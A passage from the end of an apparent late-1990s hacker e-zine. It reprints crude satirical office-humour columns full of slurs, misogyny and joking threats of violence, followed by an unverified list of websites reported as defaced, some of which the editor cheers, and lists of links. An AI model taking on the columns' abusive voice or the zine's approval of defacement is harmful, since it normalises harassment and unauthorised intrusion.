  8151.             If I ever see you within even six feet of the coffee machine I'll Bruce Lee on your sorry ass. Mister Coffee, he my man. 'Cause only I know the perfect
  8152.       proportion: two and three eighths scoops of Folgers to three and one quarter cups of water. Ain't no use trying to do it yourself 'cause you'll just fuck it up; only I can
  8153.       do it right. 'Cause I got Kung Fu Grip. You got a problem with that? I got a problem with your existence, motherfucker. I was fucking your mother while you were
  8154.       still watching Fat Albert in yo' Underoos. 
  8155.       
  8156.             I don't answer to nobody. One day I be blastin' the phat beats, and the company president come up to me and say, "Herbert, the Muzak is too loud, please turn
  8157.       down the receiver." I say, "I need my tunes when I be preparing account statements." Then he say, "I don't care, turn it down, it's distracting." So you know what I
  8158.       do? After he leaves for the day I steal a shitload of mints from his desk. He gets the message, and he don't give me no trouble no more. I be fucking his wife on the
  8159.       sly, anyhow. 
  8160.       
  8161.             So don't fuck with this H-Dog Daddy Mack Mack Daddy Comin' Out Your Ass Badass, 'cause if you do I be comin' after you like pastrami on rye to whip
  8162.       your muthafukin' sorry ass. I mean it. Don't. Fuck. With. Me.
  8163.       
  8164.  
  8165.       ------------------/--------------- 
  8166.  
  8167.  
  8168.       Keep Your Fucking Shit Off My Desk
  8169.       
  8170.       
  8171.       By Herbert Kornfeld 
  8172.       Accounts Receivable Supervisor
  8173.       
  8174.             Yo, yo, yo, yo, yo, bruthahs 'n' sistahs. H-Dog here, His Stone Cold Baadness, The Original Gangsta, The Mack Daddy, The Freaky Gangbanga. And I got
  8175.       somethin' to say to all y'all bitches out there: Keep yo' motherfuckin' shit offa my desk, or I'll fuck your sorry ass up wit' a quickness. And I don't want to see y'all
  8176.       comin' around, puttin' your feet on it, neither. Or puttin' your goddamn coffee cups on it and leaving them fucked-up rings all upside the wood and shit. 
  8177.       
  8178.             'Cause I keep my fly shit on my desk. I gots my dope spreadsheets, my hangin' file folders, my delinquent-account file, my paper clips, my Post-It note
  8179.       dispenser, my monthly desk planner, my Midstate Office Supply business cards, my four-color ball-point pen, my motherfuckin' dot-matrix printer address labels,
  8180.       and my stoopid-fresh three-hole punch. Not to mention my computer. I swear, if I see any of y'all within three feet of my computer, I'll put a Lee Van Cleef on your
  8181.       bitch ass. I'll come at you like a mother fuck. 
  8182.       
  8183.             I'm just trying to keep it real, know what I'm sayin'? I wanna stop the violence before it starts. I could say nothin' and wait in the shadows like some
  8184.       motherfuckin' ninja, and when some punk-ass temp worker come along and start readin' my "Attitude Is A Little Thing That Makes A Big Difference" Successories
  8185.       mouse pad, I could jump out and knock the sucka's teeth the fuck out. 'Cause that would be my right. A man's gotta protect what's his, right? 
  8186.       
  8187.             Take what happened just last week. Judy Metzger, this li'l skank-ass ho from Accounts Payable, be runnin' her ass around the office, puttin' cupcakes wit' the
  8188.       goddamn smiley faces and shit on people's desks. I'm like, "Whus this smiley-face shit y'all be puttin' on my desk?" And she's like, "I made cupcakes for everyone in
  8189.       the office last night!" 
  8190.       
  8191.             Now, I don't take shit from nobody, and I sure as hell don't take no shit from some bitch from Accounts Payable, so I picks up my letter opener and do some
  8192.       crazy kung-fu shit on her. "Flag yo' ass outta here, bitch, and keep yo' fuckin' cupcake shit offa my fly desk." 
  8193.       
  8194.             She go runnin' out of the room and go gets her supervisor, Myron Schabe, from across the hall. Like I'm supposed to be scared of that. Myron older than shit
  8195.       and he wear bow ties like he Pee Wee Muthafuckin' Herman or somethin'. So then he come up to my cubicle and say, "Herbert, I think there's been a
  8196.       misunderstanding. It was Judy's turn this week to bring in a treat." I tell him I don't like no bitches from Accounts Payable puttin' no shit on my desk. But this Myron
  8197.       fool keep pushin' it, tellin' me: "It was meant as a nicety, Herbert, nothing else. It's Co-Worker Appreciation Month, and everybody's scheduled to bring in a treat.
  8198.       You yourself are signed up for next Wednesday." 
  8199.       
  8200.             So you know what I tell him? I says, "I ain't gonna be bringing in no motherfuckin' treat, motherfucker. Treats is for old ladies in the nursing home and shit. And
  8201.       ain't nobody gonna be layin' they smiley-face bullshit on my dope fly desk. I gots everything where I want it, and ain't no little ho gonna be fuckin' it all up. So take
  8202.       yo' bitch-ass, bow-tie self and get the fuck out of my cubicle before I cut you, beee-yaatch!" 
  8203.       
  8204.             After that, Myron walk out of there wit' his li'l dick between his legs. Ain't no Accounts Payable supervisor motherfucka gonna tell Herbert Kornfeld what to do.
  8205.       And no one else, for that matter. You put shit on my desk, you just signed your death warrant. I mean it. Heads will get flown. 
  8206.       
  8207.             H-Dog out. And to all my homies in Accountz Reeceevable and the bruthahs kickin' it down in Shipping, keep ya heads up. Peace.
  8208.  
  8209.      
  8210.      
  8211.      ------------------/------------------
  8212.      
  8213.      I Be The Real Employee Of The Month
  8214.  
  8215.  
  8216.       By Herbert Kornfeld 
  8217.       Accounts Receivable Supervisor 
  8218.       
  8219.             Yo yo yo yo, whassssuuup, G's. H-Dog in tha house, and you'll pardon me if I dispense with the usual formalities, but I'm out for muthafuckin' REVENGE. You
  8220.       see, some dirty cocksucka dared fuck with me, Tha Stone Cold Funky-Fresh Bad-Ass Of Accountz Reeceevable. I swear, before I sign out for lunch today I'm
  8221.       gonna Hong Kong on that sorry fool's ass. I'm gonna cut him a permanent smile wit' my Letter Opener Of Death. I'm serious. Heads will get flown. 
  8222.       
  8223.             The shit came down yesterday morning, when Gerald Luckenbill, head comptroller at Midstate Office Supply, called a big-ass meeting to announce the
  8224.       Employee Of Tha Month. I figure, this meetin' gonna be real short, 'cause everybody knows who be the best employee at Midstate Office Supply--ME. Hell, I
  8225.       already got me so many Employee Of Tha Month plaques on my desk, I need a bigger muthafuckin' cubicle. 
  8226.       
  8227.             So you know what that bitch-ass Luckenbill do? He give the muthafuckin' Employee Of Tha Month plaque to muthafuckin' Phil Weinstein from customer
  8228.       muthafuckin' service. Luckenbill say Weinstein got chosen because of "his outstanding service to the company and the gracious and courteous manner in which he
  8229.       always treats the customers." That's bullshit, man. Weinstein only got chose Employee Of Tha Month 'cause his supervisor, Sandra Schumacher, wanna ride his
  8230.       cock. 
  8231.       
  8232.             I don't need no dust-crotch supervisor ho wantin' to freak my ass, 'cause I be my own muthafuckin' supervisor, and I don't answer to nobody. I be the real
  8233.       Employee Of Tha Month. Everybody think, ol' Herbert, he don't deserve no Employee Of Tha Month award. He ain't got no shit on nobody. But think again,
  8234.       suckas. 
  8235.       
  8236.             Shit gets done when I'm around. Ain't nobody balance more spreadsheets in a pay period than me. I coordinate the second-shift check-processing schedule like
  8237.       a mother fuck. Bills be sent. I even do shit I don't need to do. Like when Rose Powell, that head payroll bitch from Human Resources, quit, I helped that
  8238.       department out, 'cause Human Resources manager Bob Cowan don't know shit about payroll and woulda fucked it all up. All this, and I'm goin' to night school. I be
  8239.       just three credits away from my two-year accounting degree, and Midstate be payin' my tuition, besides. 
  8240.       
  8241.             If that all wasn't enough, the second-floor vendin' machine even stopped servin' up them nasty muthafuckin' nut rolls 'cause of me. You see, last Tuesday, the
  8242.       man from Karlsen Vending came by to restock the vending machine, and I said to him, "You better stop loadin' this thing with them skank-ass Pearson's Nut Rolls if
  8243.       you know what's good for you, cocksucka." And just like that, he stopped. Why? 'Cause he shit-scared of me. He knows I gots the Kung Fu grip. And I gots so
  8244.       much dead presidents in my pocket from workin' all that overtime last Christmas season, when this fiscal year is through I'm gonna take me a long vacation and chill
  8245.       out with some of my bitches in Branson, MO. 
  8246.       
  8247.             I'm so good, I even got this one motherfuckin' delinquent account that's been in our files for months to pay the fuck up. That's right. See, one day, I was readin'
  8248.       the newspaper, and I saw this legal notice sayin' that the fucka who owed us all this cash was goin' bankrupt, and that any creditors who were owed money by him
  8249.       had best make theyselves known wit' a quickness. So I tell that Luckenbill about it, he calls our lawyer, and, before you know it, Midstate Office Supply gets this
  8250.       check for $4,130 in the mail. That bitch got wrote off. Uh huh. So when I says I superbad, I ain't just blowin' shit out my ass. H-Dog gots tha flava. 
  8251.       
  8252.             Luckenbill said he gonna recommend I get a raise for my swift resolvin' of that delinquent account, but I told him, "Don't do me no damn favors, L, 'cause I gots
  8253.       me a score to settle." It's payback time for that Weinstein asshole. He ain't even been with the company a year, and he think he can hustle in on my award. Guess
  8254.       again, punk. I'm gonna jump in my fly hoopty and run this cocksucka down like a fuckin' dog. Weinstein's eyes gonna be buggin' when he sees my 1981 Buick
  8255.       Regal, a.k.a. Tha Nite Ridahh, comin' up on his sorry ass in the employee parking lot. Pow! I'm gonna take him out like I'm muthafuckin' Scarface, man. 
  8256.       
  8257.             Daddy H over and OUT. But before I go, I wanna send some shout-outs to my homies around the office, and all the other righteous folks who be down with the
  8258.       H-Dog: my posse in Accountz Reeceevable, Gary, Linda, and Gladys; Ruth B. down in Inventory; tha Extra-Strength Disciples in Accounting; Janitor X; the whole
  8259.       gang over at Snap-Rite Corporation, makers of funky-dope spreadsheets and fly file folders; them cafeteria bitches Theresa and Donna; and Principles Of
  8260.       Accounting, Volume 4. Peace.
  8261.  
  8262.              
  8263.       
  8264.        @HWA
  8265.        
  8266.        
  8267.        
  8268.  SITE.1 www.interscape.403-security.org
  8269.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8270.        
  8271.        This is a new website off the 403 server that is hosting the Interscape
  8272.        group and their efforts to bringing you a site with helpful software and
  8273.        original textfiles. Nice pleasing and easy to use layout, well worth a
  8274.        look see, drop by and check it out. 
  8275.                   
  8276.        
  8277.        @HWA
  8278.        
  8279.          
  8280.          
  8281.   H.W Hacked websites 
  8282.       ~~~~~~~~~~~~~~~~
  8283.  
  8284.       Note: The hacked site reports stay, especially with some cool hits by
  8285.             groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
  8286.  
  8287.           * Hackers Against Racist Propaganda (See issue #7)
  8288.  
  8289.      
  8290.       Haven't heard from Catharsys in a while for those following their saga visit
  8291.       http://frey.rapidnet.com/~ptah/ for 'the story so far'...
  8292.       
  8293.      
  8294.      
  8295.      Looks like things are quieter than normal perhaps with all the FBI action thats
  8296.      going down and groups getting raided some people are becoming a little antsy, 
  8297.      well heres the list for this week according to HNN...
  8298.      
  8299.      
  8300.      From HNN rumours section, http://www.hackernews.com/ 
  8301.       
  8302.      contributed by Anonymous 
  8303.       Cracked
  8304.       Just a reminder that HNN has not been able to verify all
  8305.       of the sites listed below. This is why they are listed in
  8306.       the rumors section. Most of these sites (90%) where
  8307.       allegedly cracked by the Portugal group F0rpaxe in
  8308.       retaliation of recent FBI raids. 
  8309.  
  8310.       The following sites have been reported to HNN as
  8311.       Cracked.
  8312.       http://hanyang.ac.kr 
  8313.       http://lstc.edu 
  8314.       http://www.kingjunk.com 
  8315.       http://do-nt.8j.net 
  8316.       http://www.canada.org.mx 
  8317.       http://www.comicsexpress.com 
  8318.       http://www.matrixmerchant.com 
  8319.       http://www.phreaker.org 
  8320.       http://www.saratoganational.com
  8321.       http://www.avaa.com 
  8322.       http://www.cafe.tg 
  8323.       http://www.sinadic.gov.ve 
  8324.       http://www.ncspca.org 
  8325.       http://www.nyshta.org 
  8326.       http://www.schroonlake.org 
  8327.       http://www.troop4.org 
  8328.       http://www.wakpominee.org 
  8329.       http://www.warrencounty.org 
  8330.       http://www.washingtoncounty.org 
  8331.       http://www.avaa.com 
  8332.       http://www.lonepenguin.com 
  8333.       http://www.michaelsgroup.com 
  8334.       http://www.microbanker.com 
  8335.       http://www.nomadmotel.com 
  8336.       http://www.nordicks.com 
  8337.       http://www.northcountryimports.com 
  8338.       http://www.ornamint.com 
  8339.       http://www.petdistributor.com 
  8340.       http://www.pornamerica.com 
  8341.       http://www.ramadainnalbany.com 
  8342.       http://www.rawlinsmotel.com 
  8343.       http://www.roaringbrookranch.com 
  8344.       http://www.saratoganational.com 
  8345.       http://www.schroonlakerealestate.com 
  8346.       http://www.scooperdoggie.com 
  8347.       http://www.seamscan.com 
  8348.       http://www.shelteredlakes.com 
  8349.       http://www.shopaviationmall.com 
  8350.       http://www.sunroomliving.com 
  8351.       http://www.surfsideonthelake.com 
  8352.       http://www.thefoodservicesite.com 
  8353.       http://www.theinnonthelibrarylawn.com 
  8354.       http://www.timmayer.com 
  8355.       http://www.tntsat.com 
  8356.       http://www.treasurecoveresort.com 
  8357.       http://www.valleypoolsandspas.com 
  8358.       http://www.villagerlg.com 
  8359.       http://www.wakitamotel.com 
  8360.       http://www.wakondacampground.com 
  8361.       http://www.jobdiscovery.org 
  8362.       http://www.swets.nl 
  8363.       http://www.sccm.edu 
  8364.       http://www.afjca891.com 
  8365.       http://www.albuquerquecars.com 
  8366.       http://www.arrowfinancial.com 
  8367.       http://www.astrowire.com 
  8368.       http://www.augustacars.com 
  8369.       http://www.bandbreservations.com 
  8370.       http://www.bitcastle.com 
  8371.       http://www.can-network.com 
  8372.       http://www.dutchessmotel.com 
  8373.       http://www.espey.com 
  8374.       http://www.fallsfarm.com 
  8375.       http://www.gfnational.com 
  8376.       http://www.hanlonspub.com 
  8377.       http://www.journeysendlodging.com 
  8378.       http://www.kokeinc.com 
  8379.       http://www.lakegeorgesteamboat.com 
  8380.       http://www.lakehouseonlakegeorge.com 
  8381.       http://www.leesmotel.com 
  8382.       http://www.lincolnlogs.com 
  8383.       http://www.mansionhill.com 
  8384.       http://www.netblue.com 
  8385.       http://www.networkofcommerce.com 
  8386.       http://www.newworldsales.com 
  8387.       http://www.steppingstonesresort.com 
  8388.       http://www.stillbay.com 
  8389.       http://www.xpandcorp.com 
  8390.       http://www.pingnet.com 
  8391.       http://www.omg.org 
  8392.       http://www.merco.com.mx 
  8393.       http://www.roland.net 
  8394.       http://www.virtuallyyours.net 
  8395.       http://www.cocacola.be 
  8396.       http://www.galoucura.com.br 
  8397.       http://www.jewel-world.com 
  8398.       http://www.relative-web.com 
  8399.       http://newsfeed.hollywood.com 
  8400.       http://www.aviationnetwork.com 
  8401.       http://coopra.inel.gov 
  8402.       http://nbcsun2.ios.doi.gov 
  8403.       
  8404.       June 2nd
  8405.       
  8406.       From HNN's rumours section;
  8407.       
  8408.       contributed by Anonymous 
  8409.       Cracked
  8410.       The following web sites have been reported as Cracked.
  8411.       http://www.legal-med.com 
  8412.       http://www.manateeisland.com 
  8413.       http://penny.educ.monash.edu.au 
  8414.       http://pestdata.ncsu.edu 
  8415.       http://www.aftenposten.no 
  8416.       http://www.bpfa.com 
  8417.       http://www.rapides.k12.la.us 
  8418.       http://policyworks.gov 
  8419.       http://ogp1.policyworks.gov 
  8420.       http://webcouncil.policyworks.go
  8421.       http://y2k.policyworks.gov 
  8422.       http://www.bnl.gov
  8423.       
  8424.       June 3rd
  8425.       
  8426.       contributed by Anonymous 
  8427.       
  8428.       
  8429.       Cracked
  8430.       The following sites have been reported to HNN as being cracked.
  8431.       http://www.jabby.com
  8432.       http://www.pinnacleleadership.com 
  8433.       http://ce.hannam.ac.kr 
  8434.       http://www.contourconstruction.com 
  8435.       http://www.mrc.twsu.edu 
  8436.       http://www.opamerica2.com 
  8437.       http://www.utneza.edu.mx 
  8438.       http://www.tomas98.org.mx 
  8439.  
  8440.       June 4th
  8441.       
  8442.       contributed by Anonymous 
  8443.       Cracked
  8444.       http://www.pocketstheclown.com
  8445.       http://www.polskaszkola.com 
  8446.       http://www.cyber-n.net 
  8447.       http://newfort.tesser.com 
  8448.       http://www.intersky.com.mx 
  8449.       http://www.sco-servicios.com.mx 
  8450.       http://rsd.gsfc.nasa.gov 
  8451.       http://www.getwiredweb.com 
  8452.       http://www.cyts.com.cn 
  8453.       http://www.moviedom.com.cn 
  8454.       http://www.libo.com.cn 
  8455.       http://www.xfl.com.cn 
  8456.       http://www.zz.com.cn 
  8457.       http://www.chinabusiness.com.cn 
  8458.       http://www.ynst.net.cn 
  8459.       http://www.cscu.edu.cn 
  8460.       http://www.nwnu.edu.cn 
  8461.       http://www.gi.com.mx 
  8462.       http://www.decnet.com 
  8463.       http://www.win-shareware.com
  8464.       
  8465.      
  8466.        -------------------------------------------------------------------------
  8467.        
  8468.   A.0                              APPENDICES
  8469.        _________________________________________________________________________
  8470.  
  8471.  
  8472.  
  8473.   A.1 PHACVW, sekurity, security, cyberwar links
  8474.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8475.  
  8476.        The links are no longer maintained in this file, there is now a
  8477.       links section on the http://welcome.to/HWA.hax0r.news/ url so check
  8478.       there for current links etc.
  8479.  
  8480.       The hack FAQ (The #hack/alt.2600 faq)
  8481.       http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
  8482.       <a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>
  8483.  
  8484.       Hacker's Jargon File (The quote file)
  8485.       http://www.lysator.liu.se/hackdict/split2/main_index.html
  8486.       <a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>
  8487.  
  8488.       New Hacker's Jargon File.
  8489.       http://www.tuxedo.org/~esr/jargon/ 
  8490.       <a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
  8491.       
  8492.       
  8493.       HWA.hax0r.news Mirror Sites:
  8494.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8495.       http://www.csoft.net/~hwa/ 
  8496.       http://www.digitalgeeks.com/hwa.
  8497.       http://members.tripod.com/~hwa_2k
  8498.       http://welcome.to/HWA.hax0r.news/
  8499.       http://www.attrition.org/~modify/texts/zines/HWA/
  8500.       http://packetstorm.genocide2600.com/hwahaxornews/
  8501.       http://archives.projectgamma.com/zines/hwa/.  
  8502.       http://www.403-security.org/Htmls/hwa.hax0r.news.htm
  8503.  
  8504.  
  8505.       International links:(TBC)
  8506.       ~~~~~~~~~~~~~~~~~~~~~~~~~
  8507.  
  8508.       Foreign correspondants and others please send in news site links that
  8509.       have security news from foreign countries for inclusion in this list
  8510.       thanks... - Ed
  8511.  
  8512.       
  8513.           
  8514.       Belgium.......: http://bewoner.dma.be/cum/              
  8515.                       <a href="http://bewoner.dma.be/cum/">Go there</a> 
  8516.       
  8517.       Brasil........: http://www.psynet.net/ka0z              
  8518.                       <a href="http://www.psynet.net/ka0z/">Go there</a>
  8519.       
  8520.                       http://www.elementais.cjb.net           
  8521.                       <a href="http://www.elementais.cjb.net/">Go there</a>
  8522.       
  8523.       Columbia......: http://www.cascabel.8m.com              
  8524.                       <a href="http://www.cascabel.8m.com/">Go there</a>
  8525.       
  8526.                       http://www.intrusos.cjb.net             
  8527.                       <a href="http://www.intrusos.cjb.net">Go there</a>
  8528.       
  8529.       Indonesia.....: http://www.k-elektronik.org/index2.html 
  8530.                       <a href="http://www.k-elektronik.org/index2.html">Go there</a>
  8531.       
  8532.                       http://members.xoom.com/neblonica/      
  8533.                       <a href="http://members.xoom.com/neblonica/">Go there</a>
  8534.       
  8535.                       http://hackerlink.or.id/                
  8536.                       <a href="http://hackerlink.or.id/">Go there</a>
  8537.       
  8538.       Netherlands...: http://security.pine.nl/                
  8539.                       <a href="http://security.pine.nl/">Go there</a>       
  8540.       
  8541.       Russia........: http://www.tsu.ru/~eugene/              
  8542.                       <a href="http://www.tsu.ru/~eugene/">Go there</a>
  8543.       
  8544.       Singapore.....: http://www.icepoint.com                 
  8545.                       <a href="http://www.icepoint.com">Go there</a>
  8546.                       
  8547.       Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
  8548.                       <a href="http://www.trscene.org/">Go there</a>              
  8549.  
  8550.     Got a link for this section? email it to hwa@press.usmc.net and i'll
  8551.     review it and post it here if it merits it.
  8552.  
  8553.     @HWA
  8554.     
  8555.  
  8556.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  8557.     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  8558.  
  8559.     ⌐ 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
  8560.     
  8561.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
  8562.      --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  8563.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  8564.    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  8565.        [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]    
  8566.  
  8567.  
  8568.